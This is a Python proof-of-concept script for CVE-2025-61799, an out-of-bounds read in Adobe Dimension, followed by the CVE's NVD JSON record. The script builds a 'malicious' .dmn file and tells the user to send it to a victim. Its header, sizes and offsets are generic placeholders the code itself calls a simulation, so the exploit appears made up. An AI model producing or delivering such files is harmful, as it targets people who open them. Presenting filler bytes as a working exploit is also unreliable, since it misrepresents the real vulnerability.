CVE-2025-61799

# CVE-2025-61799 PoC - Adobe Dimension Out-of-Bounds Read # This PoC demonstrates the vulnerability concept by creating a crafted file # that triggers out-of-bounds read when parsed by Adobe Dimension <= 4.1.4 import struct import os def create_malicious_dimension_file(filename): """ Create a crafted file that triggers out-of-bounds read vulnerability in Adobe Dimension when parsing. """ # Adobe Dimension file header simulation # The vulnerability is triggered by abnormal size/offset values # that cause the parser to read beyond allocated memory header = b'DMNS' # Magic bytes for Dimension file format version = struct.pack('<I', 0x04010400) # Version 4.1.4 # Crafted metadata with oversized dimension values # This triggers the out-of-bounds read condition metadata = struct.pack('<I', 0xFFFFFFFF) # Abnormally large chunk size metadata += struct.pack('<Q', 0xDEADBEEFCAFEBABE) # Invalid offset pointer # Malicious payload data payload = b'A' * 1024 # Fill with controlled data # Additional crafted fields to maximize exploitation potential exploit_data = struct.pack('<I', 0x41414141) # Controlled value exploit_data += b'\x00' * 256 # Padding # Write the malicious file with open(filename, 'wb') as f: f.write(header) f.write(version) f.write(metadata) f.write(payload) f.write(exploit_data) print(f"[+] Malicious file created: {filename}") print(f"[!] Send this file to victim to trigger CVE-2025-61799") if __name__ == '__main__': output_file = 'malicious_dimension.dmn' create_malicious_dimension_file(output_file) print(f"\n[*] File size: {os.path.getsize(output_file)} bytes") print("[*] When opened with Adobe Dimension <= 4.1.4, this file") print("[*] will trigger an out-of-bounds read vulnerability")

{"cve": {"id": "CVE-2025-61799", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:52.267", "lastModified": "2025-10-16T17:38:35.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dimension versions 4.1.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dimension:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.5", "matchCriteriaId": "03D05CE7-FF6A-4914-850B-10D66BB93E29"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dimension/apsb25-103.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}